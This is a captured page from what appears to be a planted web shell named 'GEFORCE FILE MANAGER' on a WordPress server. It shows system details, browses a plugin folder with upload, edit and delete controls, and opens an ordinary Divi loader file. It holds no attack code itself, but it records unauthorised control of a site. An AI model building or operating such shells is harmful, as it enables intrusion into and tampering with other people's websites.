[ SYSTEM ]: Linux wordpress 6.1.0-44-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.164-1 (2026-03-09) x86_64
[ SERVER ]: Apache/2.4.66 (Debian) | PHP: 8.2.30
[ USER ]: www-data | IP: 172.19.30.54
GEFORCE FILE MANAGER
/
var
/
www
/
html
/
wordpress
/
wp-content
/
plugins
/
presto-player
/
inc
/
Integrations
/
Divi
/
includes
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📁 modules
SET
[ DEL ]
📄 PrestoDiviExtension.php
1,035 B
SET
[ EDIT ]
|
[ DEL ]
📄 loader.php
335 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: loader.php
<?php if ( ! class_exists( 'ET_Builder_Element' ) ) { return; } $module_files = glob( __DIR__ . '/modules/*/*.php' ); // Load custom Divi Builder modules foreach ( (array) $module_files as $module_file ) { if ( $module_file && preg_match( "/\/modules\/\b([^\/]+)\/\\1\.php$/", $module_file ) ) { require_once $module_file; } }